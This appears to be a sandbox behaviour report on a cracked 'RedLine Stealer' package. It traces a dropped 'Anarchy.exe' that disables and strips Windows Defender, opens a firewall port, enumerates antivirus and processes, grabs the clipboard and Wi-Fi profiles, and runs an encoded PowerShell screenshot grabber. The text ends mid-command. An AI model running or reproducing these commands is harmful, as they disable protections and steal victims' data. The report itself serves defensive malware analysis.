Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
3488	7zG.exe
2968	RedLine.MainPanel-cracked.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2004	builder.exe
1396	builder.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1176 wrote to memory of 4860	1176	chrome.exe	83
PID 1176 wrote to memory of 4860	1176	chrome.exe	83
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 4788	1176	chrome.exe	84
PID 1176 wrote to memory of 5008	1176	chrome.exe	85
PID 1176 wrote to memory of 5008	1176	chrome.exe	85
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86
PID 1176 wrote to memory of 3736	1176	chrome.exe	86

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://zelenka.guru/proxy.php?link=https%3A%2F%2Fgofile.io%2Fd%2FrrVkK9&hash=aee71227bcd2e07805a068cfb8b0c4b2
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff96de3ab58,0x7ff96de3ab68,0x7ff96de3ab78
  2⤵
  PID:4860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1604 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:2
  2⤵
  PID:4788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:8
  2⤵
  PID:5008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2224 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:8
  2⤵
  PID:3736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3060 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4628 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:1
  2⤵
  PID:2388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4708 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:1
  2⤵
  PID:4384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4352 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:8
  2⤵
  PID:1152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3252 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:8
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4060 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:1
  2⤵
  PID:4580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4292 --field-trial-handle=1732,i,7121085368442574978,12086674797093282042,131072 /prefetch:8
  2⤵
  PID:2416

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4060

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:868

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap31624:104:7zEvent4693
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\RedLine Stealer Cracked\OpenPort.bat"
1⤵
PID:4192
- C:\Windows\system32\netsh.exe
  netsh advfirewall firewall add rule name="RLS" dir=in action=allow protocol=TCP localport=6677
  2⤵
  - Modifies Windows Firewall
  PID:328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\RedLine Stealer Cracked\OpenPort.bat" "
1⤵
PID:2004
- C:\Windows\system32\netsh.exe
  netsh advfirewall firewall add rule name="RLS" dir=in action=allow protocol=TCP localport=6677
  2⤵
  - Modifies Windows Firewall
  PID:5076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\RedLine Stealer Cracked\OpenPort.bat" "
1⤵
PID:1992
- C:\Windows\system32\netsh.exe
  netsh advfirewall firewall add rule name="RLS" dir=in action=allow protocol=TCP localport=6677
  2⤵
  - Modifies Windows Firewall
  PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\RedLine Stealer Cracked\OpenPort.bat" "
1⤵
PID:2344
- C:\Windows\system32\netsh.exe
  netsh advfirewall firewall add rule name="RLS" dir=in action=allow protocol=TCP localport=6677
  2⤵
  - Modifies Windows Firewall
  PID:2876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\RedLine Stealer Cracked\OpenPort.bat" "
1⤵
PID:696
- C:\Windows\system32\netsh.exe
  netsh advfirewall firewall add rule name="RLS" dir=in action=allow protocol=TCP localport=6677
  2⤵
  - Modifies Windows Firewall
  PID:3376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\RedLine Stealer Cracked\OpenPort.bat" "
1⤵
PID:2032
- C:\Windows\system32\netsh.exe
  netsh advfirewall firewall add rule name="RLS" dir=in action=allow protocol=TCP localport=6677
  2⤵
  - Modifies Windows Firewall
  PID:1684

C:\Users\Admin\Desktop\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe
"C:\Users\Admin\Desktop\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:1240
- C:\Users\Admin\AppData\Local\Temp\RedLine.MainPanel-cracked.exe
  "C:\Users\Admin\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  PID:2968
- - C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\builder.exe
    "C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\builder.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:1396
- C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe
  "C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:1152
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe"
    3⤵
    - Executes dropped EXE
    PID:1992
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3920
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe'"
        5⤵
        
        PID:536
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5172
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:1340
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5108
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:3396
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:3012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:2904
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:2716
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:4412
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:5800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        
        PID:1868
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5656
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4496
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5956
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:3884
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5752
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        
        PID:3432
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        
        PID:5944
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:5128
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:5848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:5208
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AD